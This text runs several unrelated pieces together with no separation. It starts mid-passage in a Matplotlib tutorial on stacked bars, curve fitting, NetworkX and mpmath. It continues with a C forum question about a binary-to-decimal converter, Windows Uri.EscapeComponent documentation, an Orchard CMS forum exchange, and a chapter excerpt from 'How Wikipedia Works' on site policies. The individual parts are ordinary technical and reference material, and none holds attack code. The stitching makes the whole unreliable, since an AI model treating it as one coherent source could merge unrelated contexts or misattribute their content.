bottom += data[i]
We update the bottom array. By adding the current data line, we know what the bottom line will be to plot the next bars on top of it.
# label the X ticks with years
plt.xticks(np.arange(len(years))+width/2,
[int(year) for year in years])
We then add the tick's labels, the years elements, right in the middle of the bar.
# some information on the plot
plt.xlabel('Years')
plt.ylabel('Population (in billions)')
plt.title('World Population: 1950 - 2050 (predictions)')
Add some information to the graph.
# draw a legend, with a smaller font
plt.legend(loc='upper left',
prop=font_manager.FontProperties(size=7))
We now draw a legend in the upper-left position with a small font (to better fit the empty space).
# apply the custom function as Y axis formatter
plt.gca().yaxis.set_major_formatter(FuncFormatter(billions))
Finally, we change the Y-axis label formatter, to use the custom formatting function that we defined earlier.
The result is the next screenshot where we can see the composition of the world population divided by continents:
In the preceding screenshot, the whole bar represents the total world population, and the sections in each bar tell us about how much a continent contributes to it. Also observe how the custom color map works: from bottom to top, we have represented Africa in red, Asia in orange, Europe in light green, Latin America in green, Northern America in light blue, and Oceania in blue (barely visible as the top of the bars).
Plotting extrapolated data using curve fitting
While plotting the CSV values, we have seen that there were some columns representing predictions of the world population in the coming years. We'd like to show how to obtain such predictions using the mathematical process of extrapolation with the help of curve fitting.
Curve fitting is the process of constructing a curve (a mathematical function) that best fits a series of data points.
This process is related to other two concepts:
- interpolation: A method of constructing new data points within the range of a known set of points
- extrapolation: A method of constructing new data points outside a known set of points
The results of extrapolation are subject to a greater degree of uncertainty and are influenced a lot by the fitting function that is used.
So it works this way:
- First, a known set of measures is passed to the curve fitting procedure that computes a function to approximate these values
- With this function, we can compute additional values that are not present in the original dataset
Let's first approach curve fitting with a simple example:
# Numpy and Matplotlib
import numpy as np
import matplotlib.pyplot as plt
These are the classic imports.
# the known points set
data = [[2,2],[5,0],[9,5],[11,4],[12,7],[13,11],[17,12]]
This is the data we will use for curve fitting. They are the points on a plane (so each has a X and a Y component)
# we extract the X and Y components from previous points
x, y = zip(*data)
We aggregate the X and Y components in two distinct lists.
# plot the data points with a black cross
plt.plot(x, y, 'kx')
Then plot the original dataset as a black cross on the Matplotlib image.
# we want a bit more data and more fine grained for
# the fitting functions
x2 = np.arange(min(x)-1, max(x)+1, .01)
We prepare a new array for the X values because we wish to have a wider set of values (one unit to the right and one to the left of the original list) and a fine grain to plot the fitting function nicely.
# lines styles for the polynomials
styles = [':', '-.', '--']
To differentiate better between the polynomial lines, we now define their styles list.
# getting style and count one at time
for d, style in enumerate(styles):
Then we loop over that list by also considering the item count.
# degree of the polynomial
deg = d + 1
We define the actual polynomial degree.
# calculate the coefficients of the fitting polynomial
c = np.polyfit(x, y, deg)
Then compute the coefficients of the fitting polynomial whose general format is:
c[0]*x**deg + c[1]*x**(deg - 1) + ... + c[deg]
# we evaluate the fitting function against x2
y2 = np.polyval(c, x2)
Here, we generate the new values by evaluating the fitting polynomial against the x2 array.
# and then we plot it
plt.plot(x2, y2, label="deg=%d" % deg, linestyle=style)
Then we plot the resulting function, adding a label that indicates the degree of the polynomial and using a different style for each line.
# show the legend
plt.legend(loc='upper left')
We then show the legend, and the final result is shown in the next screenshot:
Here, the polynomial with degree=1 is drawn as a dotted blue line, the one with degree=2 is a dash-dot green line, and the one with degree=3 is a dashed red line.
We can see that the higher the degree, the better the fit of the function against the data.
Let's now revert to our main intention, trying to provide an extrapolation for population data. First a note: we take the values for 2010 as real data and not predictions (well, we are quite near to that year); otherwise we would have very few values to create a realistic extrapolation.
Let's see the code:
# for file opening made easier
from __future__ import with_statement
# numpy
import numpy as np
# matplotlib plotting module
import matplotlib.pyplot as plt
# matplotlib colormap module
import matplotlib.cm as cm
# Matplotlib font manager
import matplotlib.font_manager as font_manager
# bar width
width = .8
# open CSV file
with open('population.csv') as f:
# read the first line, splitting the years
years = map(int, f.readline().split(',')[1:])
# we prepare the dtype for exacting data; it's made of:
# <1 string field> <6 integers fields>
dtype = [('continents', 'S16')] + [('', np.int32)]*len(years)
# we load the file, setting the delimiter and the dtype above
y = np.loadtxt(f, delimiter=',', dtype=dtype)
# "map" the resulting structure to be easily accessible:
# the first column (made of string) is called 'continents'
# the remaining values are added to 'data' sub-matrix
# where the real data are
y = y.view(np.dtype([('continents', 'S16'),
('data', np.int32, len(years))]))
# extract fields
data = y['data']
continents = y['continents']
This is the same code that is used for the CSV example (reported here for completeness).
x = years[:-2]
x2 = years[-2:]
We are dividing the years into two groups: up to 2010, and after 2010. This translates to splitting off the last two elements of the years list.
What we are going to do here is prepare the plot in two phases:
- First, we plot the data we consider certain values
- After this, we plot the data from the UN predictions next to our extrapolations
# prepare the bottom array
b1 = np.zeros(len(years)-2)
We prepare the array (made of zeros) for the bottom argument of bar().
# for each line in data
for i in range(len(data)):
# select all the data except the last 2 values
d = data[i][:-2]
For each data line, we extract the information we need, so we remove the last two values.
# create bars for each element, on top of the previous bars
bt = plt.bar(range(len(d)), d, width=width,
color=cm.hsv(32*(i)), label=continents[i],
bottom=b1)
# update the bottom array
b1 += d
Then we plot the bar, and update the bottom array.
# prepare the bottom array
b2_1, b2_2 = np.zeros(2), np.zeros(2)
We need two arrays because we will display two bars for the same year—one from the CSV and the other from our fitting function.
# for each line in data
for i in range(len(data)):
# extract the last 2 values
d = data[i][-2:]
Again, for each line in the data matrix, we extract the last two values that are needed to plot the bar for CSV.
# select the data to compute the fitting function
y = data[i][:-2]
Along with the other values needed to compute the fitting polynomial.
# use a polynomial of degree 3
c = np.polyfit(x, y, 3)
Here, we set up a polynomial of degree 3; there is no need for higher degrees.
# create a function out of those coefficients
p = np.poly1d(c)
This method constructs a polynomial starting from the coefficients that we pass as parameter.
# compute p on x2 values (we need integers, so the map)
y2 = map(int, p(x2))
We use the polynomial that was defined earlier to compute its values for x2. We also map the resulting values to integer, as the bar() function expects them for height.
# create bars for each element, on top of the previous bars
bt = plt.bar(len(b1)+np.arange(len(d)), d, width=width/2,
color=cm.hsv(32*(i)), bottom=b2_1)
We draw a bar for the data from the CSV. Note how the width is half of that of the other bars. This is because in the same width we will draw the two sets of bars for a better visual comparison.
# create the bars for the extrapolated values
bt = plt.bar(len(b1)+np.arange(len(d))+width/2, y2,
width=width/2, color=cm.bone(32*(i+2)),
bottom=b2_2)
Here, we plot the bars for the extrapolated values, using a dark color map so that we have an even better separation for the two datasets.
# update the bottom array
b2_1 += d
b2_2 += y2
We update both the bottom arrays.
# label the X ticks with years
plt.xticks(np.arange(len(years))+width/2,
[int(year) for year in years])
We add the years as ticks for the X-axis.
# draw a legend, with a smaller font
plt.legend(loc='upper left',
prop=font_manager.FontProperties(size=7))
To avoid a very big legend, we used only the labels for the data from the CSV, skipping the interpolated values. We believe it's pretty clear what they're referring to. Here is the screenshot that is displayed on executing this example:
The conclusion we can draw from this is that the United Nations uses a different function to prepare the predictions, especially because they have a continuous set of information, and they can also take into account other environmental circumstances while preparing such predictions.
Tools using Matplotlib
Given that it's has an easy and powerful API, Matplotlib is also used inside other programs and tools when plotting is needed. We are about to present a couple of these tools:
- NetworkX
- Mpmath
NetworkX
NetworkX is a Python module that contains tools for creating and manipulating (complex) networks, also known as graphs.
A graph is defined as a set of nodes and edges where each edge is associated with two nodes. NetworkX also adds the possibility to associate properties to each node and edge.
NetworkX is not primarily a graph drawing package but, in collaboration with Matplotlib (and also with Graphviz), it's able to show the graph we're working on.
In the example we're going to propose, we will show how to create a random graph and draw it in a circular shape.
# matplotlib
import matplotlib.pyplot as plt
# networkx nodule
import networkx as nx
In addition to pyplot, we also import the networkx module.
# prepare a random graph with n nodes and m edges
n = 16
m = 60
G = nx.gnm_random_graph(n, m)
Here, we set up a graph with 16 nodes and 60 edges, chosen randomly from all the graphs with such characteristics. The graph returned is undirected: edges just connect two nodes, without a direction information (from node A to node B or vice versa).
# prepare a circular layout of nodes
pos = nx.circular_layout(G)
Then we are using a node positioning algorithm, particularly to prepare a circular layout for the nodes of our graphs; the returned variable pos is a 2D array of nodes' positions forming a circular shape.
# define the color to select from the color map
# as n numbers evenly spaced between color map limits
node_color = map(int, np.linspace(0, 255, n))
We want to give a nice coloring to our nodes, so we will use a particular color map, but before that we have to identify what colors of the color map would be assigned to each node. We do this by selecting 16 numbers evenly spaced in the 256 available colors in the color map. We now have a progression of numbers that will result in a nice fading effect in the nodes' colors.
# draw the nodes, specifying the color map and the list of color
nx.draw_networkx_nodes(G, pos,
node_color=node_color, cmap=plt.cm.hsv)
We start drawing the graph from the nodes. We pass the graph object, the position pos to draw nodes in a circular layout, the color map, and the list of colors to be assigned to the nodes.
# add the labels inside the nodes
nx.draw_networkx_labels(G, pos)
We then request to draw the labels for the nodes. They are numbers identifying the nodes plotted inside them.
# draw the edges, using alpha parameter to make them lighter
nx.draw_networkx_edges(G, pos, alpha=0.4)
Finally, we draw the edges between nodes. We also specify the alpha parameter so that they are a little lighter and don't just appear as a complicated web of lines.
# turn off axis elements
plt.axis('off')
We then remove the Matplotlib axis lines and labels. The result is as shown in the next screenshot where the nodes' colors are distributed across the whole color spectrum:
We advise you to look at the examples available on the NetworkX web site. If you like this kind of stuff, then you'll enjoy it for sure.
Mpmath
mpmath is a mathematical library, written in pure Python, for multiprecision floating-point arithmetic, which means that every calculation done using mpmath can have an arbitrarily high number of precision digits. This is extremely important for fields such as numerical simulation and analysis.

It also contains a high number of mathematical functions, constants, and a library of tools commonly needed in mathematical applications, with astonishing performance.
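(As a tiny illustration of the arbitrary precision, using mpmath's dps setting:)

import mpmath as mp

mp.mp.dps = 50     # work with 50 significant decimal digits
print(mp.sqrt(2))  # square root of 2 printed to 50 digits
print(mp.pi)       # constants are available at the same precision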
In conjunction with Matplotlib, mpmath provides a convenient plotting interface to display a function graphically.
It is extremely easy to plot with mpmath and Matplotlib:
In [1]: import mpmath as mp
In [2]: mp.plot(mp.sin, [-6, 6])
In this example, the mpmath plot() method takes the function to plot and the interval where to draw it.
Running this code, the following window pops up:
We can also plot multiple functions at a time and define our own functions too:
In [1]: import mpmath as mp
In [2]: mp.plot([mp.sqrt, lambda x: -0.1*x**3 + x-0.5], [-3, 3])
On executing the preceding code snippet, we get the following screenshot where we have plotted the square root (in blue, upper part) and the function we defined (in red, lower part):
To plot more functions, simply provide a list of them to plot(). To define a new function, we use a lambda expression.
Note how the square root plot is done in full lines for positive values of X, while it's dotted in the negative part. This is because for X negatives, the result is a complex number: mpmath represents the real part with dashes and the imaginary part with dots.
Summary
In this article, we have seen several examples of real world Matplotlib usage, including:
- How to plot data read from a database
- How to plot data extracted from a parsed Wikipedia article
- How to plot data from parsing an Apache log file
- How to plot data from a CSV file
- How to plot extrapolated data using a curve fitting polynomial
- How to plot using third-party tools such as NetworkX and mpmath
We hope these practical examples have increased your interest in exploring Matplotlib, if you haven't already explored it!
I've been working on the binary-to-decimal converter program. Not having a fun time with it!!

This is what I have:
#include <stdio.h>
#include <stdlib.h>
#include <math.h>

int main(void)
{
    /* variables */
    int decimalValue = 0;
    int counter = 0;
    int nextDigit = 0;
    char binary = 0;

    /* begin */
    printf("Please enter a binary string of 1's and 0's: ");
    scanf("%c", &binary);

    /* get 1st digit of binary */
    nextDigit = binary % 10;

    while (binary) {
        if (nextDigit != 0) {
            decimalValue += (int) pow(2, counter);
        }
        counter++;

        /* get next digit of binary */
        binary = binary / 10;
        nextDigit = binary % 10;
    }

    printf("The Value is %i in decimal\n", decimalValue);
    system("PAUSE");
    return 0;
} /* main */
It likes to return 3 as an answer no matter what. I can't figure out where it's going wrong :(
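(For reference, a minimal sketch of the same loop reading the input with %d instead of %c, so the digits are treated as a number rather than a single character code; variable names mirror the original.)

#include <stdio.h>
#include <math.h>

int main(void)
{
    int decimalValue = 0;
    int counter = 0;
    long binary = 0;

    printf("Please enter a binary string of 1's and 0's: ");
    scanf("%ld", &binary);        /* read the whole number, not one char */

    while (binary) {
        if (binary % 10 != 0)
            decimalValue += (int) pow(2, counter);
        counter++;
        binary = binary / 10;     /* move to the next binary digit */
    }

    printf("The Value is %i in decimal\n", decimalValue);
    return 0;
}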
Uri.EscapeComponent | escapeComponent method
Converts a Uniform Resource Identifier (URI) string to its escaped representation.
Syntax
Parameters
- toEscape
Type: String [JavaScript] | Platform::String [C++]
The string to convert.
Return value
Type: String [JavaScript] | Platform::String [C++]
The escaped representation of toEscape.
Remarks
Use EscapeComponent as a utility to escape any URI component that requires escaping in order to construct a valid Uri object. For example, if your app is using a user-provided string and adding it to a query that is sent to a service, you may need to escape that string in the URI because the string might contain characters that are invalid in a URI. This includes characters as simple as spaces; even input that seems to be pure ASCII may still need encoding to be valid as a component of a URI.
You can append the string you get from EscapeComponent onto other strings before calling the Uri(String) constructor. You'll want to encode each component separately, because you do not want to escape the characters that are significant to how the Uri(String) constructor parses the string into components, such as the "/" between host and path or the "?" between path and query.
EscapeComponent might also be useful for other scenarios where a URI-escaped string is needed for an HTTP request scenario, such as using APIs in the Windows.Web.Http namespace.
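(A brief usage sketch in C++/CX; the strings and URI below are arbitrary examples, not taken from the documentation:)

using namespace Platform;
using namespace Windows::Foundation;

// Escape a user-provided component before composing the URI string.
String^ raw = "John Smith & sons";
String^ escaped = Uri::EscapeComponent(raw);

// Safe to concatenate: reserved characters in the component are now encoded.
Uri^ uri = ref new Uri("http://www.example.com/search?q=" + escaped);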
Requirements (device family)
Requirements (operating system)
See also
Hi All,
I'm trying to create a projection with a custom content part I have created through code; however, one of the properties, which is just a string prop, does not appear to be available.
public class SummaryPart : ContentPart<SummaryPartRecord>
{
    [Required]
    public string Summary {
        get { return Record.Summary; }
        set { Record.Summary = value; }
    }
}
After I initially create the SummaryPart via Migrations, I add a Media Picker field, which is available to add for the Projection. Any idea why I can't use the Summary property in the Projection?
Many thanks in advance,
Peter
You'll need to add a binding for the property. Check the bindings tab inside of the query admin.
Thanks so much Brandon - just what I was looking for! Thanks again
How Wikipedia Works/Chapter 13
Wikipedia's official policies apply to everyone—if you're editing Wikipedia at all, rather than just reading it, then you have to accept that site policies apply to you too. Policies determine what types of articles are acceptable, what styles of writing are appropriate, and generally how editors should behave.
These policies are not dictated from on high. Like Wikipedia's articles, they've been developed collaboratively by community members. In principle, anyone on the site can write and edit policy, and this chapter will brief you about how to participate. It will provide background on Wikipedia tradition and customs, which will help you understand the terms in which a debate is usually posed and give you a feel for how change is actually implemented.
This chapter will also give you a working knowledge of the existing policies and some of the core principles behind them.
All aspects of policy are explicitly documented on project pages. These pages, just like Wikipedia articles, are editable and supported by discussion pages on which community members work out details and changes.
Contents
- The Spirit of Wikipedia
- What Is Policy?
- Summary
- Letter of the Law
The Spirit of Wikipedia
You won't master Wikipedia's policies just by poring over policy pages. People new to the site need an introduction to Wikipedia's culture, not just a rule book. Much of what happens on Wikipedia is not strictly governed by written rules. For example, Wikipedia is a working environment in which a huge encyclopedia is written by a diverse group. This isn't official policy. But this is why serious Wikipedians are on the site. Wikipedia certainly has policies against disrupting the site, but defining disruption is like drawing a line between distracting someone at the desk next to you for a good reason and actually preventing him or her from working. Don't expect disruption to be completely spelled out, any more than in real life. In that way, common sense is the first aspect of policy to master. You can't expect policies to be summed up completely by any one slogan, but this section will cover what many contributors see as Wikipedia's central principles.
The Five Pillars
We’ll start with the five pillars of Wikipedia, a harmonious summary of the principles that guide the site.
- Wikipedia is an encyclopedia (not anything else).
- Wikipedia has a neutral point of view (the NPOV policy).
- Wikipedia is free content that anyone may edit. (All Wikipedia content is freely licensed and free of charge, and content is freely editable.)
- Wikipedia has a code of conduct. (Editors should behave civilly toward each other.)
- Wikipedia does not have firm rules. (The editing community can change the rules.)
The five pillars summarize Wikipedia as a website, a mission, and a community. We don’t need to say more about the first three points since they were covered in Chapters 1, 2, and 5. In this chapter, we’ll focus on detailing the fourth and fifth pillars and associated behavior policies. In the next two sections, we’ll talk about three philosophies—one policy and two guidelines—that are at the core of how Wikipedia operates.
Ignore All Rules and Be Bold
Wikipedia has a degree of organization, but no one could accuse it of precision. The site organizes itself and is not managed by a top-down structure. Some of the consequences may seem contrarian, lax, or possibly a little rude. The principle of no firm rules can seem contrary but is deeply rooted in Wikipedia culture. The fifth pillar leads to a basic policy: Ignore All Rules (IAR).
The policy reads, in its entirety: If the rules prevent you from improving or maintaining Wikipedia, ignore them.
This policy appears at Wikipedia:Ignore all rules (shortcut WP:IAR).
Policies and guidelines, in other words, exist to create the best site possible. They are not ends in themselves; they can be changed, and they may be ignored when common sense dictates. Wikipedia is not, however, an anarchy (see WP:ANARCHY), so most rules are not under threat of being disregarded; Ignore all rules simply serves to release pressure when needed. Rules should be ignored when necessary or for a good reason, and most of the rules, or policies and guidelines, help Wikipedia function more smoothly. Ignore All Rules has been around from the beginning of Wikipedia—it expresses a core value of the project. The earliest version of the policy expresses the intended sentiment well: If rules make you nervous and depressed, and not desirous of participating in the Wiki, then ignore them and go about your business.
Closely related is the guideline (and site philosophy): Be Bold. Be Bold exhorts contributors to be bold in editing pages! This philosophy is fundamental to Wikipedia. With no top-down structure, work gets done, not because it was assigned as a task but because someone decided to be bold and do it. Although Be Bold is not an excuse to contradict standard policies and procedures, don’t be shy about improving the site. In the spirit of being bold, newcomers shouldn’t worry about whether their ideas conform completely to custom. Wikipedia has no set demarcations of who can work on what. But newcomers should be polite in presenting their ideas, another core principle. Be bold!—but be civil, too. Edits can be reverted; uncivil exchanges with other editors cannot be unsaid.
This whole attitude of no demarcations is, in turn, related to the idea of so fix it, which, though not a policy or guideline, is a core part of wiki culture. Almost everything is freely editable—and thus fixable—by anyone, and volunteers do virtually all the work. The response to complaining is likely to be “so fix it.” This is enshrined in a template that can be used to answer complaints about content or other problems. The {{sofixit}} template starts off,
Thank you for your suggestion. When you feel an article needs improvement, please feel free to make those changes.
This concept helps explain a Wikipedian lightbulb joke:
- Q: How many Wikipedians does it take to change a lightbulb?
- A: Zero. Just tag the light bulb as {{unscrewed}} and let someone else worry about it.
A little cynical perhaps, but the point is true about voluntary projects. You can find more of the same at User:Bibliomaniac15/How many Wikipedians does it take to screw in a lightbulb?. This doesn't mean constructive criticism isn't welcomed. The point is that wiki sites are designed to allow critics to intervene: If you feel sidelined about making some remarks, those "sidelines" are in your imagination; they aren't coming from Wikipedia. The essay Wikipedia:BOLD, revert, discuss cycle (shortcut WP:BRD) makes some interesting points. The essay is couched in the language of dispute resolution and concedes that being bold may be provocative. Someone interested and confident enough can make a sweeping change that may be reverted. This change may still be helpful, though; it may break a logjam or a consensus that has become too entrenched. Be opportunistic about new changes: You don't have to revert to a previous, safer version.
Don’t Stuff Beans up Your Nose A modern fable about contrarianism is popular on Wikipedia: the small boy who wouldn’t have thought of putting beans up his nose until it was forbidden. Online, contrarians often claim to be the loyal opposition to groupthink(discussed further in Chapter 14). See WP:BEANS and the summary, If they haven’t done it already, don’t tell a user not to do a specific stupid thing. It may encourage them to do it. In other words, a contrarian can easily become counter-suggestible, so simply having more and more rules is worse than light regulation that makes good sense to almost everyone.
Assume Good Faith
The fourth pillar deals with conduct on the site. Inevitably, Wikipedia has some problem users, but most users don’t cause problems at all. Assume Good Faith (often abbreviated as AGF) is a key part of understanding how to deal with others on the site. Assume Good Faith was introduced in Chapter 12 as an aspiration. But Assume Good Faith is also a basic guideline because it helps preserve Wikipedia’s good working environment.
Wikipedia’s culture is to assume that mistakes are generally good-faith errors. The Internet has become a place where people are often assumed to bring their own agenda to any discussion. Wikipedia cannot change this assumption directly, but Assume Good Faith helps reduce the tendency to suspect others’ motives. In other words, leave your baggage at the door!
Assuming good faith is a choice you make that reduces friction. Editors should assume all other editors are sincerely trying to improve the project. This means treating all other editors' contributions in a professional, fair-minded fashion. Someone who ignores a formatting guideline may simply be making an honest mistake. Someone infringing on a policy may be unaware of it. Bias may be unintentional. Discuss your differences with other editors on talk pages before jumping to conclusions about their motives.
This is not to say that Wikipedia doesn’t have true trolls, vandals, and other scalawags editing articles. Dispute resolution (covered in depth in Chapter 14) provides processes for dealing with a difficult editor when the evidence shows that he or she is not acting in good faith. By and large, however, most people edit Wikipedia because they want to contribute and help. Believing that is best—until you have firm evidence otherwise. Most likely, this is how you would want to be treated in an unfamiliar place; dispute resolution is not for vague suspicions.
- Further Reading
- Explanations of the five pillars of Wikipedia
- The guideline to assume good faith
- The guideline to be bold when editing pages
- Ignore all rules, the first rule on Wikipedia and now a policy
What Is Policy?
Policy on Wikipedia refers to the large collection of documents that have been developed over time by the editing community. An important working distinction is made between official policy and guidelines. Similar to the familiar distinction between what is mandatory (regulations you are required to follow) and what is only advisory, policies are meant to be followed by all contributors in their work on the site, whereas guidelines are like a manual of standard practices. Policies and guidelines are sometimes first developed in essays, which are position papers posted on the site by an individual editor in his or her user space or the Wikipedia namespace for others to work on; though many essays are quite popular and are often cited in discussions, they typically do not have the same level of consensus as policies and guidelines and are not mandatory.
Ignoring official policy or guidelines doesn't benefit you. Policies have a clear status and generally represent more fundamental principles that have broad consensus among editors. Guidelines should at least have wide consensus, though, and reflect common sense or good practice as applied to the production of Wikipedia. A guideline may only be advice about some stylistic detail, but the advice will generally be good.
Official Policy
Official policy is a category: simply said, project pages belonging to this category are official policy pages. At the time of this writing, Wikipedia has 46 policy pages in this category.
Wikipedia has no body that can make a policy official; this declaration is based on consensus. A few policies have been adopted at the Wikimedia Foundation level, which are non-negotiable at the project level, but these deal primarily with the content license and privacy practices (see Chapter 17, The Foundation and Project Coordination for the Wikimedia Foundation's policies). Everyday matters of policy on the English-language Wikipedia are not really affected by the Foundation.
Most policies are, therefore, a matter of consensus within the editing community. Here are two significant comments from the Official policy category page:
There are only a few key policies that might be regarded as "official"—that is, considered by the founders and the vast majority of contributors as being particularly important to the running of Wikipedia. […] They have either withstood the test of time or have been adopted by consensus or acclamation.
and
Very often, there is no "bright line" distinction between proposed policy, guidelines, and "actual" policy. Policy at Wikipedia is a matter of consensus, tradition, and practice. While the principles of the policies in this category are mostly well established, the details are often still evolving, so not everything in these pages represent hard and fast rules.
Though this is true, over time policy becomes firmer and less subject to change.
Policies and Guidelines
Policies and guidelines on Wikipedia have a wide scope: They include article style issues, contributor behavior standards, and content inclusion rules. All policies and guidelines exist on pages in the Wikipedia namespace. The policy pages are by no means all equally important. Later in this chapter, we'll analyze these pages to give you a concise, readable introduction.
Policy documents typically have much context and history behind their creation and wording. Both the spirit and the letter of the policy are important; editors should comply with the principles expressed. The most important point will be the expression of some reasonable expectation of how editors should act under normal conditions. The drafting of the policy reflects this: The main thrust of a policy is to convey one idea, and this idea should make good sense to someone familiar with the site. For instance, the ordinary editor doesn't need to read the fine print on the policy page outlining the value of consensus. But administrators making decisions based on discussions will require more information about what consensus means.
Principles of policy are different from specific processes or procedures but are often interrelated. Take, for example, the Article Deletion policy. The policy refers to the various deletion processes; it doesn't discuss the details of how the specific processes work. Rather, it authorizes them.
How Policies Are Created and Developed
Wikipedia does not have a special area just for drafting legislation. The starting point for a new policy may be a new project page in the Wikipedia namespace or possibly an essay that makes sense to other editors and begins to be referenced in discussions. Policies and guidelines, like other content on Wikipedia, are then developed over time by interested editors through a consensus-based process. Policies and guidelines are typically altered to reflect changing practice on the site or to solve a problem that has arisen. If consensus for a new proposed policy can't be reached, the proposal will be dropped.
If a change to policy sticks, in the sense that it has been on the policy page for some weeks without being removed and discussion seems to support the change, the new or amended policy has been widely accepted. The expectation is then that all editors will begin to follow the new policy when someone points it out. Keeping informed about changing policies and guidelines is a real issue for editors; beyond the core content and behavioral policies, many editors may not know about all the policies and guidelines. This is where Assume Good Faith applies: If User:Alice sees that User:Bob isn't following a new guideline, Alice should let Bob know that the guideline changed last month rather than scold him.
Policy and guideline creation, in practice, starts and ends in the Wikipedia namespace. The fact that policy pages are editable is one of the radical, counterintuitive Wikipedia concepts. Minor changes to policy formulations can occur at any time if the community agrees the changes are needed; major changes and new policies are also slowly developed to meet new needs and changing circumstances.
Of course, the practical process for changing policy is not so simple as just making an edit. Policies can and do change; however, the process is often very slow. On pages in the Wikipedia Talk namespace discussions are always ongoing, proposing and criticizing changes to policy. Most policy page changes are reverted if they are substantive and have not been discussed previously on the attached talk page and perhaps on other community forums. Always seek a high level of consensus before making a change to a key policy page. Given a policy's role in regulating the site, more discussion is required than elsewhere. For basic guidance on participating in policymaking, go to Wikipedia:How to contribute to Wikipedia guidance.
For example, on May 11, 2007, a new section was added to Wikipedia:Disambiguation, the guideline regulating 70,000 disambiguation pages on Wikipedia. The material had already been discussed at Wikipedia talk:Manual of Style (disambiguation pages); the guideline called for adding a new section, so-called Set index articles, to recognized page types. In this somewhat notorious area (the ambiguities of ambiguity, you could say), the following case was made:
A set index article describes a single set of concepts. For example, Dodge Charger describes a set of cars, List of peaks named Signal Mountain describes a set of mountain peaks, or USS Enterprise describes a set of ships. A set index article is both for information and for navigation: just like a normal list article, it can have metadata and extra information about each entry. A set index article can be entertaining and informative by itself, can help editors find redlinks to create articles on notable entries, and finally can also help readers navigate between articles that have similar names.
So an exception to the general guideline was made for a small group of articles. This incremental change by User:Hike395 was accepted, replacing what previously only applied to lists of ships with the same name. You can reasonably assume that the amendment, by being vetted through discussion, has been accepted through consensus by the editors interested in disambiguation pages; for other contributors not involved in the discussion who may happen to work in this area, the guideline now provides more detailed information that they should reasonably follow in most cases. If a future contributor comes along and has a serious problem with this or any other part of the guideline, the contributor may state his or her case on the guideline's talk page, beginning the cycle again.
This example is a relatively simple case, affecting a particular stylistic guideline for a certain type of article. On the other hand, proposed changes to the Notability guideline or Verifiability policy—policies that affect every Wikipedia article and indeed, the nature of the site itself—should be debated for weeks or months on the policy's talk page and on other forums. Changes to these policies may be difficult to make unless very compelling reasons are given. This difficulty does not necessarily reflect the proposal's validity, but simply how difficult getting consensus is among the very wide group of editors—potentially, the entire community—who may be interested in site-wide policy changes.
Essays written by individual Wikipedians are not at all official, but they may eventually serve as the basis for policies or guidelines. You can find hundreds of essays at; anyone, naturally, may add to these. Essays are policy development as pamphlet writing; you should expect to present your ideas first before proposing a big policy change. Essays are also a useful platform for expressing an opinion on applying policies. Some of the most-cited essays, however, are humorous expositions on basic Wikipedia ideals and ways to behave; Wikipedia:No climbing the Reichstag dressed as Spider-Man is an example, pointing out that you shouldn't take debates so seriously you go to extreme measures to make a fuss about them.
Many proposals for future policy are made and then abandoned due to lack of interest or consensus. You can read many of these in the category of rejected proposals, each marked with a rejection template; for example, Wikipedia:Changing policies and guidelines was an attempt to clarify that certain policy changes require consensus before being made; somewhat ironically, this policy didn't make the cut. You can get some good insights into the shaping of policy from reading rejected proposals.
Summary
Wikipedia's policies have evolved from being simple principles to being a large group of pages. You can probably count the ones on the site that matter most in daily life on the fingers of two hands. Understanding the basic point of a given policy or guideline, as it affects you, and in combination with Wikipedia's customs, is more important than worrying about the details or how others should comply. Bring policy into arguments only when you have to, and if you become involved in developing or modifying policy pages, make sure you can take the lead in getting consensus among the community.
How Policies Evolve
If you want to change something about how Wikipedia works, you'll have to make an effort and accept that it will only happen piecemeal. Preparing for policy changes matters greatly. You can't always expect to change a guideline with which you disagree on some minor point of style or format and then proceed directly to edit the whole site to change that point wherever you can find it—this behavior is rightly viewed as disruptive. If you encounter some resistance, you have to respect the objections people raise. If they didn't know the guideline was being changed, they weren't part of the consensus you claimed. If too many people disagree with some aspect of policy, the policy will likely be modified.
For example, a controversial change to the Spoiler warnings guideline caused a furor in May 2007. A spoiler-warning template had traditionally been used on the site in a Plot section of a film or book article, as a warning to those unfamiliar with the work being discussed that the text they were about to read would give the story away. These warnings had been an accepted feature of Wikipedia for years. But some pent-up feelings against them existed: Some argued that they interfered with the encyclopedia function, or in other words, serious reference works don't need spoiler warnings. The wide use of spoiler warnings concealed the fact that their presence in articles annoyed many editors.
The page Wikipedia:Spoiler was edited: What it currently says (as of April 2008) includes this new text:
Spoilers on the Internet are sometimes preceded by a spoiler warning. In Wikipedia, however, it is generally expected that the subjects of our articles will be covered in detail. Therefore, Wikipedia carries no spoiler warnings except for the Content disclaimer.
Once a tipping point had been reached, with those against spoiler warnings gaining control of that guideline page, over 45,000 spoiler warnings were rapidly deleted from Wikipedia. This change caused tension and many back and forth arguments at the time. Though still controversial, the change has (so far) stuck.
How to Interpret Policies and Guidelines
Don't be legalistic about reading policy pages—a practice known unfavorably as wikilawyering. Policies are not drafted like legal documents, so don't push their meaning beyond the basic point or intention. The correct approach is usually this: Read the policy first to see what is required and respect the intent and spirit of the policy.
Assuming that policies can settle arguments is only human. Policies are actually there to help Wikipedia work, defining more closely what should be done and preserving a good atmosphere. They are not primarily tools for resolving disputes over content. Although such disputes may well come down to a discussion of policies and how they should be applied, be reasonable, collegiate, and open-minded in bringing policy into edit wars. A narrow view of a policy or guideline is not likely to resolve matters.
We Got Here from Where?
Sometimes you need to understand how policies evolved to see what they are really saying and what weight you should give them. Discussions leading up to the development of policies, like all discussions, are kept on the site, though reviewing the archives is not always an easy or clear process. Policies can appear path-dependent, and if you suspect a policy has been widened over time, you might be right. This is also a part of policy evolution.
The No Original Research (NOR) policy, for instance, was first formulated to keep original theories in physics from Wikipedia. Its application has since expanded to include other topics. On the wiki-en mailing list (6 December 2004), Jimmy Wales wrote:
Some who completely understand why Wikipedia ought not create novel theories of physics by citing the results of experiments and so on and synthesizing them into something new, may fail to see how the same thing applies to history.
By now the NOR policy very much applies to history: Wikipedia wants neither theories about how Einstein had it all wrong about relativity, nor historical theories that have no serious scholarly support, for example, about the Ten Lost Tribes, if these theories are presented as original research and argument.
- Further Reading
- The policy on policies and guidelines; a good overview of policies, guidelines, and proposals
- Advice on changing policies
- The category of proposed new policies
- The category of rejected policies
- Basic rules to work by
Letter of the Law
To understand policy details, you first have to find the relevant pages, next get the basic gist of a policy, and only then look at the more specific points. The precise wording of a policy may well change over time while the general idea remains the same.
For many policies, Wikipedia has handy nutshell summaries, which we've imported (current as of August 2007). For others, we've written our own summary. The uppercase abbreviated title is the page shortcut, less WP; so, for example, you can find Attack Page (ATP) at WP:ATP.
List of Policies
